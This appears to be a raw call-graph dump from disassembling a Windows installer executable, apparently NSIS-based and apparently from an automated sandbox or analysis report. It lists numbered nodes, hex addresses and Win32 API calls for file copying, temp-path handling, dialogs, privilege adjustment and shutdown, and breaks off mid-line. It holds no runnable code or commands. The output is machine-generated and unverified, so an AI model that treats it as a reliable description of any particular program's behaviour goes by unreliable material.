4235->4237 4238 401cca SendMessageTimeoutW 4235->4238 4239 401d28 4236->4239 4237->4239 4238->4239 4247 4028e9 4248 4028ef 4247->4248 4249 4028f7 FindClose 4248->4249 4250 402c4f 4248->4250 4249->4250 4251 40496a 4252 4049a0 4251->4252 4253 40497a 4251->4253 4254 404527 8 API calls 4252->4254 4255 4044c0 22 API calls 4253->4255 4257 4049ac 4254->4257 4256 404987 SetDlgItemTextW 4255->4256 4256->4252 4258 4016f1 4259 402dcb 21 API calls 4258->4259 4260 4016f7 GetFullPathNameW 4259->4260 4261 401711 4260->4261 4267 401733 4260->4267 4264 40689e 2 API calls 4261->4264 4261->4267 4262 401748 GetShortPathNameW 4263 402c4f 4262->4263 4265 401723 4264->4265 4265->4267 4268 406541 lstrcpynW 4265->4268 4267->4262 4267->4263 4268->4267 4269 401e73 GetDC 4270 402da9 21 API calls 4269->4270 4271 401e85 GetDeviceCaps MulDiv ReleaseDC 4270->4271 4272 402da9 21 API calls 4271->4272 4273 401eb6 4272->4273 4274 40657e 21 API calls 4273->4274 4275 401ef3 CreateFontIndirectW 4274->4275 4276 40265d 4275->4276 4277 402975 4278 402dcb 21 API calls 4277->4278 4279 402981 4278->4279 4280 402997 4279->4280 4281 402dcb 21 API calls 4279->4281 4282 40600c 2 API calls 4280->4282 4281->4280 4283 40299d 4282->4283 4305 406031 GetFileAttributesW CreateFileW 4283->4305 4285 4029aa 4286 402a60 4285->4286 4287 4029c5 GlobalAlloc 4285->4287 4288 402a48 4285->4288 4289 402a67 DeleteFileW 4286->4289 4290 402a7a 4286->4290 4287->4288 4291 4029de 4287->4291 4292 4032d9 39 API calls 4288->4292 4289->4290 4306 4034d4 SetFilePointer 4291->4306 4294 402a55 CloseHandle 4292->4294 4294->4286 4295 4029e4 4296 4034be ReadFile 4295->4296 4297 4029ed GlobalAlloc 4296->4297 4298 402a31 4297->4298 4299 4029fd 4297->4299 4301 4060e3 WriteFile 4298->4301 4300 4032d9 39 API calls 4299->4300 4304 402a0a 4300->4304 4302 402a3d GlobalFree 4301->4302 4302->4288 4303 402a28 GlobalFree 4303->4298 4304->4303 4305->4285 4306->4295 4307 4014f5 SetForegroundWindow 4308 402c4f 4307->4308 4309 4045f6 lstrcpynW lstrlenW 4310 40197b 4311 402dcb 21 API calls 4310->4311 4312 401982 lstrlenW 4311->4312 4313 40265d 4312->4313 4314 4020fd 4315 4021c1 4314->4315 4316 40210f 4314->4316 4319 401423 28 API calls 4315->4319 4317 402dcb 21 API calls 4316->4317 4318 402116 4317->4318 4320 402dcb 21 API calls 4318->4320 4324 40231b 4319->4324 4321 40211f 4320->4321 4322 402135 LoadLibraryExW 4321->4322 4323 402127 GetModuleHandleW 4321->4323 4322->4315 4325 402146 4322->4325 4323->4322 4323->4325 4334 4069a4 4325->4334 4328 402190 4331 4055c6 28 API calls 4328->4331 4329 402157 4330 402167 4329->4330 4332 401423 28 API calls 4329->4332 4330->4324 4333 4021b3 FreeLibrary 4330->4333 4331->4330 4332->4330 4333->4324 4339 406563 WideCharToMultiByte 4334->4339 4336 4069c1 4337 4069c8 GetProcAddress 4336->4337 4338 402151 4336->4338 4337->4338 4338->4328 4338->4329 4339->4336 4340 402b7e 4341 402bd0 4340->4341 4342 402b85 4340->4342 4343 406935 5 API calls 4341->4343 4345 402da9 21 API calls 4342->4345 4348 402bce 4342->4348 4344 402bd7 4343->4344 4346 402dcb 21 API calls 4344->4346 4347 402b93 4345->4347 4349 402be0 4346->4349 4350 402da9 21 API calls 4347->4350 4349->4348 4351 402be4 IIDFromString 4349->4351 4352 402b9f 4350->4352 4351->4348 4353 402bf3 4351->4353 4357 406488 wsprintfW 4352->4357 4353->4348 4358 406541 lstrcpynW 4353->4358 4355 402c10 CoTaskMemFree 4355->4348 4357->4348 4358->4355 4366 40467f 4367 404697 4366->4367 4373 4047b1 4366->4373 4371 4044c0 22 API calls 4367->4371 4368 40481b 4369 4048e5 4368->4369 4370 404825 GetDlgItem 4368->4370 4376 404527 8 API calls 4369->4376 4372 40483f 4370->4372 4377 4048a6 4370->4377 4375 4046fe 4371->4375 4372->4377 4381 404865 SendMessageW LoadCursorW SetCursor 4372->4381 4373->4368 4373->4369 4374 4047ec GetDlgItem SendMessageW 4373->4374 4399 4044e2 KiUserCallbackDispatcher 4374->4399 4379 4044c0 22 API calls 4375->4379 4380 4048e0 4376->4380 4377->4369 4382 4048b8 4377->4382 4384 40470b CheckDlgButton 4379->4384 4403 40492e 4381->4403 4386 4048ce 4382->4386 4387 4048be SendMessageW 4382->4387 4383 404816 4400 40490a 4383->4400 4397 4044e2 KiUserCallbackDispatcher 4384->4397 4386->4380 4388 4048d4 SendMessageW 4386->4388 4387->4386 4388->4380 4392 404729 GetDlgItem 4398 4044f5 SendMessageW 4392->4398 4394 40473f SendMessageW 4395 404765 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4394->4395 4396 40475c GetSysColor 4394->4396 4395->4380 4396->4395 4397->4392 4398->4394 4399->4383 4401 404918 4400->4401 4402 40491d SendMessageW 4400->4402 4401->4402 4402->4368 4406 405b67 ShellExecuteExW 4403->4406 4405 404894 LoadCursorW SetCursor 4405->4377 4406->4405 4407 401000 4408 401037 BeginPaint GetClientRect 4407->4408 4409 40100c DefWindowProcW 4407->4409 4411 4010f3 4408->4411 4412 401179 4409->4412 4413 401073 CreateBrushIndirect FillRect DeleteObject 4411->4413 4414 4010fc 4411->4414 4413->4411 4415 401102 CreateFontIndirectW 4414->4415 4416 401167 EndPaint 4414->4416 4415->4416 4417 401112 6 API calls 4415->4417 4416->4412 4417->4416 4418 402a80 4419 402da9 21 API calls 4418->4419 4420 402a86 4419->4420 4421 402ac9 4420->4421 4422 402aad 4420->4422 4427 402953 4420->4427 4424 402ae3 4421->4424 4425 402ad3 4421->4425 4423 402ab2 4422->4423 4431 402ac3 4422->4431 4432 406541 lstrcpynW 4423->4432 4426 40657e 21 API calls 4424->4426 4428 402da9 21 API calls 4425->4428 4426->4431 4428->4431 4431->4427 4433 406488 wsprintfW 4431->4433 4432->4427 4433->4427 4434 401781 4435 402dcb 21 API calls 4434->4435 4436 401788 4435->4436 4437 406060 2 API calls 4436->4437 4438 40178f 4437->4438 4438->4438 4439 401d82 4440 402da9 21 API calls 4439->4440 4441 401d93 SetWindowLongW 4440->4441 4442 402c4f 4441->4442 3423 401f03 3431 402da9 3423->3431 3425 401f09 3426 402da9 21 API calls 3425->3426 3427 401f15 3426->3427 3428 401f21 ShowWindow 3427->3428 3429 401f2c EnableWindow 3427->3429 3430 402c4f 3428->3430 3429->3430 3432 40657e 21 API calls 3431->3432 3433 402dbe 3432->3433 3433->3425 4443 401503 4444 401508 4443->4444 4446 40152e 4443->4446 4445 402da9 21 API calls 4444->4445 4445->4446 4447 402903 4448 40290b 4447->4448 4449 40290f FindNextFileW 4448->4449 4450 402921 4448->4450 4449->4450 4451 402968 4449->4451 4453 406541 lstrcpynW 4451->4453 4453->4450 3537 405705 3538 405726 GetDlgItem GetDlgItem GetDlgItem 3537->3538 3539 4058af 3537->3539 3582 4044f5 SendMessageW 3538->3582 3541 4058e0 3539->3541 3542 4058b8 GetDlgItem CreateThread CloseHandle 3539->3542 3544 40590b 3541->3544 3545 405930 3541->3545 3546 4058f7 ShowWindow ShowWindow 3541->3546 3542->3541 3585 405699 OleInitialize 3542->3585 3543 405796 3549 40579d GetClientRect GetSystemMetrics SendMessageW SendMessageW 3543->3549 3547 40596b 3544->3547 3551 405945 ShowWindow 3544->3551 3552 40591f 3544->3552 3548 404527 8 API calls 3545->3548 3584 4044f5 SendMessageW 3546->3584 3547->3545 3557 405979 SendMessageW 3547->3557 3564 40593e 3548->3564 3555 40580b 3549->3555 3556 4057ef SendMessageW SendMessageW 3549->3556 3553 405965 3551->3553 3554 405957 3551->3554 3558 404499 SendMessageW 3552->3558 3560 404499 SendMessageW 3553->3560 3559 4055c6 28 API calls 3554->3559 3561 405810 SendMessageW 3555->3561 3562 40581e 3555->3562 3556->3555 3563 405992 CreatePopupMenu 3557->3563 3557->3564 3558->3545 3559->3553 3560->3547 3561->3562 3566 4044c0 22 API calls 3562->3566 3565 40657e 21 API calls 3563->3565 3567 4059a2 AppendMenuW 3565->3567 3568 40582e 3566->3568 3569 4059d2 TrackPopupMenu 3567->3569 3570 4059bf GetWindowRect 3567->3570 3571 405837 ShowWindow 3568->3571 3572 40586b GetDlgItem SendMessageW 3568->3572 3569->3564 3574 4059ed 3569->3574 3570->3569 3575 40585a 3571->3575 3576 40584d ShowWindow 3571->3576 3572->3564 3573 405892 SendMessageW SendMessageW 3572->3573 3573->3564 3577 405a09 SendMessageW 3574->3577 3583 4044f5 SendMessageW 3575->3583 3576->3575 3577->3577 3578 405a26 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3577->3578 3580 405a4b SendMessageW 3578->3580 3580->3580 3581 405a74 GlobalUnlock SetClipboardData CloseClipboard 3580->3581 3581->3564 3582->3543 3583->3572 3584->3544 3586 40450c SendMessageW 3585->3586 3590 4056bc 3586->3590 3587 4056e3 3588 40450c SendMessageW 3587->3588 3589 4056f5 CoUninitialize 3588->3589 3590->3587 3591 401389 2 API calls 3590->3591 3591->3590 4454 404d07 4455 404d33 4454->4455 4456 404d17 4454->4456 4458 404d66 4455->4458 4459 404d39 SHGetPathFromIDListW 4455->4459 4465 405b85 GetDlgItemTextW 4456->4465 4461 404d49 4459->4461 4464 404d50 SendMessageW 4459->4464 4460 404d24 SendMessageW 4460->4455 4462 40140b 2 API calls 4461->4462 4462->4464 4464->4458 4465->4460 4466 401588 4467 402bc9 4466->4467 4470 406488 wsprintfW 4467->4470 4469 402bce 4470->4469 4471 40198d 4472 402da9 21 API calls 4471->4472 4473 401994 4472->4473 4474 402da9 21 API calls 4473->4474 4475 4019a1 4474->4475 4476 402dcb 21 API calls 4475->4476 4477 4019b8 lstrlenW 4476->4477 4479 4019c9 4477->4479 4478 401a0a 4479->4478 4483 406541 lstrcpynW 4479->4483 4481 4019fa 4481->4478 4482 4019ff lstrlenW 4481->4482 4482->4478 4483->4481 4484 40168f 4485 402dcb 21 API calls 4484->4485 4486 401695 4485->4486 4487 40689e 2 API calls 4486->4487 4488 40169b 4487->4488 4489 402b10 4490 402da9 21 API calls 4489->4490 4491 402b16 4490->4491 4492 402953 4491->4492 4493 40657e 21 API calls 4491->4493 4493->4492 4494 402711 4495 402da9 21 API calls 4494->4495 4502 402720 4495->4502 4496 40276a ReadFile 4496->4502 4506 40285d 4496->4506 4497 4060b4 ReadFile 4497->4502 4498 4027aa MultiByteToWideChar 4498->4502 4499 40285f 4507 406488 wsprintfW 4499->4507 4500 406112 5 API calls 4500->4502 4502->4496 4502->4497 4502->4498 4502->4499 4502->4500 4503 4027d0 SetFilePointer MultiByteToWideChar 4502->4503 4504 402870 4502->4504 4502->4506 4503->4502 4505 402891 SetFilePointer 4504->4505 4504->4506 4505->4506 4507->4506 4508 401491 4509 4055c6 28 API calls 4508->4509 4510 401498 4509->4510 3434 401794 3472 402dcb 3434->3472 3436 40179b 3437 4017c3 3436->3437 3438 4017bb 3436->3438 3515 406541 lstrcpynW 3437->3515 3514 406541 lstrcpynW 3438->3514 3441 4017c1 3445 4067ef 5 API calls 3441->3445 3442 4017ce 3516 405e10 lstrlenW CharPrevW 3442->3516 3461 4017e0 3445->3461 3449 4017f2 CompareFileTime 3449->3461 3450 4018b2 3482 4055c6 3450->3482 3451 401889 3454 4055c6 28 API calls 3451->3454 3463 40189e 3451->3463 3454->3463 3455 406541 lstrcpynW 3455->3461 3458 4018e3 SetFileTime 3460 4018f5 CloseHandle 3458->3460 3459 40657e 21 API calls 3459->3461 3462 401906 3460->3462 3460->3463 3461->3449 3461->3450 3461->3451 3461->3455 3461->3459 3468 405ba1 MessageBoxIndirectW 3461->3468 3478 40600c GetFileAttributesW 3461->3478 3481 406031 GetFileAttributesW CreateFileW 3461->3481 3519 40689e FindFirstFileW 3461->3519 3464 40190b 3462->3464 3465 40191e 3462->3465 3466 40657e 21 API calls 3464->3466 3467 40657e 21 API calls 3465->3467 3469 401913 lstrcatW 3466->3469 3470 401926 3467->3470 3468->3461 3469->3470 3471 405ba1 MessageBoxIndirectW 3470->3471 3471->3463 3473 402dd7 3472->3473 3474 40657e 21 API calls 3473->3474 3475 402df8 3474->3475 3476 402e04 3475->3476 3477 4067ef 5 API calls 3475->3477 3476->3436 3477->3476 3479 40602b 3478->3479 3480 40601e SetFileAttributesW 3478->3480 3479->3461 3480->3479 3481->3461 3483 4055e1 3482->3483 3492 4018bc 3482->3492 3484 4055fd lstrlenW 3483->3484 3485 40657e 21 API calls 3483->3485 3486 405626 3484->3486 3487 40560b lstrlenW 3484->3487 3485->3484 3489 405639 3486->3489 3490 40562c SetWindowTextW 3486->3490 3488 40561d lstrcatW 3487->3488 3487->3492 3488->3486 3491 40563f SendMessageW SendMessageW SendMessageW 3489->3491 3489->3492 3490->3489 3491->3492 3493 4032d9 3492->3493 3494 4032f2 3493->3494 3495 40331d 3494->3495 3534 4034d4 SetFilePointer 3494->3534 3522 4034be 3495->3522 3499 40333a GetTickCount 3510 40334d 3499->3510 3500 40345e 3501 403462 3500->3501 3506 40347a 3500->3506 3503 4034be ReadFile 3501->3503 3502 4018cf 3502->3458 3502->3460 3503->3502 3504 4034be ReadFile 3504->3506 3505 4034be ReadFile 3505->3510 3506->3502 3506->3504 3507 4060e3 WriteFile 3506->3507 3507->3506 3509 4033b3 GetTickCount 3509->3510 3510->3502 3510->3505 3510->3509 3511 4033dc MulDiv wsprintfW 3510->3511 3525 406ab0 3510->3525 3532 4060e3 WriteFile 3510->3532 3512 4055c6 28 API calls 3511->3512 3512->3510 3514->3441 3515->3442 3517 4017d4 lstrcatW 3516->3517 3518 405e2c lstrcatW 3516->3518 3517->3441 3518->3517 3520 4068b4 FindClose 3519->3520 3521 4068bf 3519->3521 3520->3521 3521->3461 3535 4060b4 ReadFile 3522->3535 3526 406ad5 3525->3526 3527 406add 3525->3527 3526->3510 3527->3526 3528 406b64 GlobalFree 3527->3528 3529 406b6d GlobalAlloc 3527->3529 3530 406be4 GlobalAlloc 3527->3530 3531 406bdb GlobalFree 3527->3531 3528->3529 3529->3526 3529->3527 3530->3526 3530->3527 3531->3530 3533 406101 3532->3533 3533->3510 3534->3495 3536 403328 3535->3536 3536->3499 3536->3500 3536->3502 4525 401a97 4526 402da9 21 API calls 4525->4526 4527 401aa0 4526->4527 4528 402da9 21 API calls 4527->4528 4529 401a45 4528->4529 3635 401598 3636 4015b1 3635->3636 3637 4015a8 ShowWindow 3635->3637 3638 402c4f 3636->3638 3639 4015bf ShowWindow 3636->3639 3637->3636 3639->3638 4530 402419 4531 402dcb 21 API calls 4530->4531 4532 402428 4531->4532 4533 402dcb 21 API calls 4532->4533 4534 402431 4533->4534 4535 402dcb 21 API calls 4534->4535 4536 40243b GetPrivateProfileStringW 4535->4536 4537 40201b 4538 402dcb 21 API calls 4537->4538 4539 402022 4538->4539 4540 40689e 2 API calls 4539->4540 4541 402028 4540->4541 4543 402039 4541->4543 4544 406488 wsprintfW 4541->4544 4544->4543 3668 40351c SetErrorMode GetVersionExW 3669 403570 GetVersionExW 3668->3669 3670 4035a8 3668->3670 3669->3670 3671 4035ff 3670->3671 3672 406935 5 API calls 3670->3672 3673 4068c5 3 API calls 3671->3673 3672->3671 3674 403615 lstrlenA 3673->3674 3674->3671 3675 403625 3674->3675 3676 406935 5 API calls 3675->3676 3677 40362c 3676->3677 3678 406935 5 API calls 3677->3678 3679 403633 3678->3679 3680 406935 5 API calls 3679->3680 3681 40363f #17 OleInitialize SHGetFileInfoW 3680->3681 3756 406541 lstrcpynW 3681->3756 3684 40368e GetCommandLineW 3757 406541 lstrcpynW 3684->3757 3686 4036a0 3687 405e3d CharNextW 3686->3687 3688 4036c6 CharNextW 3687->3688 3696 4036d8 3688->3696 3689 4037da 3690 4037ee GetTempPathW 3689->3690 3758 4034eb 3690->3758 3692 403806 3693 403860 DeleteFileW 3692->3693 3694 40380a GetWindowsDirectoryW lstrcatW 3692->3694 3768 4030a2 GetTickCount GetModuleFileNameW 3693->3768 3697 4034eb 12 API calls 3694->3697 3695 405e3d CharNextW 3695->3696 3696->3689 3696->3695 3702 4037dc 3696->3702 3699 403826 3697->3699 3699->3693 3701 40382a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3699->3701 3700 403874 3703 40392b 3700->3703 3706 40391b 3700->3706 3710 405e3d CharNextW 3700->3710 3704 4034eb 12 API calls 3701->3704 3852 406541 lstrcpynW 3702->3852 3911 403b39 3703->3911 3708 403858 3704->3708 3796 403c13 3706->3796 3708->3693 3708->3703 3723 403893 3710->3723 3712 403a79 3716 405ba1 MessageBoxIndirectW 3712->3716 3713 403a9d 3714 403b21 ExitProcess 3713->3714 3715 403aa5 GetCurrentProcess OpenProcessToken 3713->3715 3717 403af1 3715->3717 3718 403abd LookupPrivilegeValueW AdjustTokenPrivileges 3715->3718 3722 403a87 ExitProcess 3716->3722 3725 406935 5 API calls 3717->3725 3718->3717 3719 4038f1 3853 405f18 3719->3853 3720 403934 3724 405b0c 5 API calls 3720->3724 3723->3719 3723->3720 3727 403939 lstrlenW 3724->3727 3728 403af8 3725->3728 3869 406541 lstrcpynW 3727->3869 3731 403b0d ExitWindowsEx 3728->3731 3733 403b1a 3728->3733 3731->3714 3731->3733 3732 403953 3735 40395c 3732->3735 3753 40396b 3732->3753 3736 40140b 2 API calls 3733->3736 3870 406541 lstrcpynW 3735->3870 3736->3714 3737 403910 3868 406541 lstrcpynW 3737->3868 3740 403991 wsprintfW 3741 40657e 21 API calls 3740->3741 3741->3753 3742 405aef 2 API calls 3742->3753 3743 405a95 2 API calls 3743->3753 3744 403a07 SetCurrentDirectoryW 3907 406301 MoveFileExW 3744->3907 3745 4039cd GetFileAttributesW 3746 4039d9 DeleteFileW 3745->3746 3745->3753 3746->3753 3750 406301 40 API calls 3750->3753 3751 40657e 21 API calls 3751->3753 3752 405b24 2 API calls 3752->3753 3753->3703 3753->3740 3753->3742 3753->3743 3753->3744 3753->3745 3753->3750 3753->3751 3753->3752 3754 403a8f CloseHandle 3753->3754 3755 40689e 2 API calls 3753->3755 3871 405c4d 3753->3871 3754->3703 3755->3753 3756->3684 3757->3686 3759 4067ef 5 API calls 3758->3759 3760 4034f7 3759->3760 3761 403501 3760->3761 3762 405e10 3 API calls 3760->3762 3761->3692 3763 403509 3762->3763 3764 405aef 2 API calls 3763->3764 3765 40350f 3764->3765 3918 406060 3765->3918 3922 406031 GetFileAttributesW CreateFileW 3768->3922 3770 4030e2 3791 4030f2 3770->3791 3923 406541 lstrcpynW 3770->3923 3772 403108 3924 405e5c lstrlenW 3772->3924 3776 403119 GetFileSize 3777 403213 3776->3777 3789 403130 3776->3789 3929 40303e 3777->3929 3779 40321c 3781 40324c GlobalAlloc 3779->3781 3779->3791 3941 4034d4 SetFilePointer 3779->3941 3780 4034be ReadFile 3780->3789 3940 4034d4 SetFilePointer 3781->3940 3783 40327f 3787 40303e 6 API calls 3783->3787 3785 403235 3788 4034be ReadFile 3785->3788 3786 403267 3790 4032d9 39 API calls 3786->3790 3787->3791 3792 403240 3788->3792 3789->3777 3789->3780 3789->3783 3789->3791 3793 40303e 6 API calls 3789->3793 3794 403273 3790->3794 3791->3700 3792->3781 3792->3791 3793->3789 3794->3791 3794->3794 3795 4032b0 SetFilePointer 3794->3795 3795->3791 3797 406935 5 API calls 3796->3797 3798 403c27 3797->3798 3799 403c2d 3798->3799 3800 403c3f 3798->3800 3950 406488 wsprintfW 3799->3950 3801 40640f 3 API calls 3800->3801 3802 403c6f 3801->3802 3804 403c8e lstrcatW 3802->3804 3806 40640f 3 API calls 3802->3806 3805 403c3d 3804->3805 3942 403ee9 3805->3942 3806->3804 3809 405f18 18 API calls 3810 403cc0 3809->3810 3811 403d54 3810->3811 3813 40640f 3 API calls 3810->3813 3812 405f18 18 API calls 3811->3812 3814 403d5a 3812->3814 3815 403cf2 3813->3815 3816 403d6a LoadImageW 3814->3816 3817 40657e 21 API calls 3814->3817 3815->3811 3820 403d13 lstrlenW 3815->3820 3824 405e3d CharNextW 3815->3824 3818 403e10 3816->3818 3819 403d91 RegisterClassW 3816->3819 3817->3816 3822 40140b 2 API calls 3818->3822 3821 403dc7 SystemParametersInfoW CreateWindowExW 3819->3821 3851 403e1a 3819->3851 3825 403d21 lstrcmpiW 3820->3825 3826 403d47 3820->3826 3821->3818 3823 403e16 3822->3823 3830 403ee9 22 API calls 3823->3830 3823->3851 3828 403d10 3824->3828 3825->3826 3829 403d31 GetFileAttributesW 3825->3829 3827 405e10 3 API calls 3826->3827 3831 403d4d 3827->3831 3828->3820 3832 403d3d 3829->3832 3834 403e27 3830->3834 3951 406541 lstrcpynW 3831->3951 3832->3826 3833 405e5c 2 API calls 3832->3833 3833->3826 3836 403e33 ShowWindow 3834->3836 3837 403eb6 3834->3837 3839 4068c5 3 API calls 3836->3839 3838 405699 5 API calls 3837->3838 3840 403ebc 3838->3840 3841 403e4b 3839->3841 3842 403ec0 3840->3842 3843 403ed8 3840->3843 3844 403e59 GetClassInfoW 3841->3844 3846 4068c5 3 API calls 3841->3846 3849 40140b 2 API calls 3842->3849 3842->3851 3845 40140b 2 API calls 3843->3845 3847 403e83 DialogBoxParamW 3844->3847 3848 403e6d GetClassInfoW RegisterClassW 3844->3848 3845->3851 3846->3844 3850 40140b 2 API calls 3847->3850 3848->3847 3849->3851 3850->3851 3851->3703 3852->3690 3953 406541 lstrcpynW 3853->3953 3855 405f29 3856 405ebb 4 API calls 3855->3856 3857 405f2f 3856->3857 3858 4038fd 3857->3858 3859 4067ef 5 API calls 3857->3859 3858->3703 3867 406541 lstrcpynW 3858->3867 3865 405f3f 3859->3865 3860 405f70 lstrlenW 3861 405f7b 3860->3861 3860->3865 3862 405e10 3 API calls 3861->3862 3864 405f80 GetFileAttributesW 3862->3864 3863 40689e 2 API calls 3863->3865 3864->3858 3865->3858 3865->3860 3865->3863 3866 405e5c 2 API calls 3865->3866 3866->3860 3867->3737 3868->3706 3869->3732 3870->3753 3872 405f18 18 API calls 3871->3872 3873 405c6d 3872->3873 3874 405c75 DeleteFileW 3873->3874 3875 405c8c 3873->3875 3876 405dc3 3874->3876 3878 405dac 3875->3878 3954 406541 lstrcpynW 3875->3954 3876->3753 3878->3876 3884 40689e 2 API calls 3878->3884 3879 405cb2 3880 405cc5 3879->3880 3881 405cb8 lstrcatW 3879->3881 3883 405e5c 2 API calls 3880->3883 3882 405ccb 3881->3882 3885 405cdb lstrcatW 3882->3885 3887 405ce6 lstrlenW FindFirstFileW 3882->3887 3883->3882 3886 405dd1 3884->3886 3885->3887 3886->3876 3888 405e10 3 API calls 3886->3888 3887->3878 3905 405d08 3887->3905 3889 405ddb 3888->3889 3891 405c05 5 API calls 3889->3891 3890 405d8f FindNextFileW 3893 405da5 FindClose 3890->3893 3890->3905 3894 405de7 3891->3894 3893->3878 3895 405e01 3894->3895 3896 405deb 3894->3896 3898 4055c6 28 API calls 3895->3898 3896->3876 3899 4055c6 28 API calls 3896->3899 3898->3876 3901 405df8 3899->3901 3900 405c4d 64 API calls 3900->3905 3902 406301 40 API calls 3901->3902 3902->3876 3903 4055c6 28 API calls 3903->3890 3904 4055c6 28 API calls 3904->3905 3905->3890 3905->3900 3905->3903 3905->3904 3906 406301 40 API calls 3905->3906 3955 406541 lstrcpynW 3905->3955 3956 405c05 3905->3956 3906->3905 3908 403a16 CopyFileW 3907->3908 3909 406315 3907->3909 3908->3703 3908->3753 3964 406187 3909->3964 3912 403b51 3911->3912 3913 403b43 CloseHandle 3911->3913 3998 403b7e 3912->3998 3913->3912 3916 405c4d 71 API calls 3917 403a6c OleUninitialize 3916->3917 3917->3712 3917->3713 3919 40606d GetTickCount GetTempFileNameW 3918->3919 3920 40351a 3919->3920 3921 4060a3 3919->3921 3920->3692 3921->3919 3921->3920 3922->3770 3923->3772 3925 405e6a 3924->3925 3926 405e70 CharPrevW 3925->3926 3927 40310e 3925->3927 3926->3925 3926->3927 3928 406541 lstrcpynW 3927->3928 3928->3776 3930 403047 3929->3930 3931 40305f 3929->3931 3932 403050 DestroyWindow 3930->3932 3933 403057 3930->3933 3934 403067 3931->3934 3935 40306f GetTickCount 3931->3935 3932->3933 3933->3779 3936 406971 2 API calls 3934->3936 3937 4030a0 3935->3937 3938 40307d CreateDialogParamW ShowWindow 3935->3938 3939 40306d 3936->3939 3937->3779 3938->3937 3939->3779 3940->3786 3941->3785 3943 403efd 3942->3943 3952 406488 wsprintfW 3943->3952 3945 403f6e 3946 403fa2 22 API calls 3945->3946 3948 403f73 3946->3948 3947 403c9e 3947->3809 3948->3947 3949 40657e 21 API calls 3948->3949 3949->3948 3950->3805 3951->3811 3952->3945 3953->3855 3954->3879 3955->3905 3957 40600c 2 API calls 3956->3957 3958 405c11 3957->3958 3959 405c32 3958->3959 3960 405c20 RemoveDirectoryW 3958->3960 3961 405c28 DeleteFileW 3958->3961 3959->3905 3962 405c2e 3960->3962 3961->3962 3962->3959 3963 405c3e SetFileAttributesW 3962->3963 3963->3959 3965 4061b7 3964->3965 3966 4061dd GetShortPathNameW 3964->3966 3991 406031 GetFileAttributesW CreateFileW 3965->3991 3968 4061f2 3966->3968 3969 4062fc 3966->3969 3968->3969 3971 4061fa wsprintfA 3968->3971 3969->3908 3970 4061c1 CloseHandle GetShortPathNameW 3970->3969 3972 4061d5 3970->3972 3973 40657e 21 API calls 3971->3973 3972->3966 3972->3969 3974 406222 3973->3974 3992 406031 GetFileAttributesW CreateFileW 3974->3992 3976 40622f 3976->3969 3977 40623e GetFileSize GlobalAlloc 3976->3977 3978 406260 3977->3978 3979 4062f5 CloseHandle 3977->3979 3980 4060b4 ReadFile 3978->3980 3979->3969 3981 406268 3980->3981 3981->3979 3993 405f96 lstrlenA 3981->3993 3984 406293 3986 405f96 4 API calls 3984->3986 3985 40627f lstrcpyA 3987 4062a1 3985->3987 3986->3987 3988 4062d8 SetFilePointer 3987->3988 3989 4060e3 WriteFile 3988->3989 3990 4062ee GlobalFree 3989->3990 3990->3979 3991->3970 3992->3976 3994 405fd7 lstrlenA 3993->3994 3995 405fb0 lstrcmpiA 3994->3995 3996 405fdf 3994->3996 3995->3996 3997 405fce CharNextA 3995->3997 3996->3984 3996->3985 3997->3994 3999 403b8c 3998->3999 4000 403b56 3999->4000 4001 403b91 FreeLibrary GlobalFree 3999->4001 4000->3916 4001->4000 4001->4001 4552 401b9c 4553 402dcb 21 API calls 4552->4553 4554 401ba3 4553->4554 4555 402da9 21 API calls 4554->4555 4556 401bac wsprintfW 4555->4556 4557 402c4f 4556->4557 4558 40149e 4559 4023c2 4558->4559 4560 4014ac PostQuitMessage 4558->4560 4560->4559 4561 4016a0 4562 402dcb 21 API calls 4561->4562 4563 4016a7 4562->4563 4564 402dcb 21 API calls 4563->4564 4565 4016b0 4564->4565 4566 402dcb 21 API calls 4565->4566 4567 4016b9 MoveFileW 4566->4567 4568 4016cc 4567->4568 4574 4016c5 4567->4574 4569 40231b 4568->4569 4570 40689e 2 API calls 4568->4570 4572 4016db 4570->4572 4571 401423 28 API calls 4571->4569 4572->4569 4573 406301 40 API calls 4572->4573 4573->4574 4574->4571 4575 401a24 4576 402dcb 21 API calls 4575->4576 4577 401a2b 4576->4577 4578 402dcb 21 API calls 4577->4578 4579 401a34 4578->4579 4580 401a3b lstrcmpiW 4579->4580 4581 401a4d lstrcmpW 4579->4581 4582 401a41 4580->4582 4581->4582 4583 402324 4584 402dcb 21 API calls 4583->4584 4585 40232a 4584->4585 4586 402dcb 21 API calls 4585->4586 4587 402333 4586->4587 4588 402dcb 21 API calls 4587->4588 4589 40233c 4588->4589 4590 40689e 2 API calls 4589->4590 4591 402345 4590->4591 4592 402356 lstrlenW lstrlenW 4591->4592 4593 402349 4591->4593 4595 4055c6 28 API calls 4592->4595 4594 4055c6 28 API calls 4593->4594 4596 402351 4593->4596 4594->4596 4597 402394 SHFileOperationW 4595->4597 4597->4593 4597->4596 4598 401da6 4599 401db9 GetDlgItem 4598->4599 4600 401dac 4598->4600 4602 401db3 4599->4602 4601 402da9 21 API calls 4600->4601 4601->4602 4603 401dfa GetClientRect LoadImageW SendMessageW 4602->4603 4604 402dcb 21 API calls 4602->4604 4606 401e58 4603->4606 4608 401e64 4603->4608 4604->4603 4607 401e5d DeleteObject 4606->4607 4606->4608 4607->4608 4609 4023a8 4610 4023af 4609->4610 4612 4023c2 4609->4612 4611 40657e 21 API calls 4610->4611 4613 4023bc 4611->4613 4614 405ba1 MessageBoxIndirectW 4613->4614 4614->4612 4615 402c2a SendMessageW 4616 402c44 InvalidateRect 4615->4616 4617 402c4f 4615->4617 4616->4617 4625 404f2d GetDlgItem GetDlgItem 4626 4051a4 4625->4626 4627 404f7f 7 API calls 4625->4627 4631 405286 4626->4631 4659 405213 4626->4659 4679 404e7b SendMessageW 4626->4679 4628 405026 DeleteObject 4627->4628 4629 405019 SendMessageW 4627->4629 4630 40502f 4628->4630 4629->4628 4632 405066 4630->4632 4633 40657e 21 API calls 4630->4633 4635 405332 4631->4635 4640 405197 4631->4640 4645 4052df SendMessageW 4631->4645 4634 4044c0 22 API calls 4632->4634 4638 405048 SendMessageW SendMessageW 4633->4638 4639 40507a 4634->4639 4636 405344 4635->4636 4637 40533c SendMessageW 4635->4637 4647 405356 ImageList_Destroy 4636->4647 4648 40535d 4636->4648 4656 40536d 4636->4656 4637->4636 4638->4630 4644 4044c0 22 API calls 4639->4644 4642 404527 8 API calls 4640->4642 4641 405278 SendMessageW 4641->4631 4646 405533 4642->4646 4660 40508b 4644->4660 4645->4640 4650 4052f4 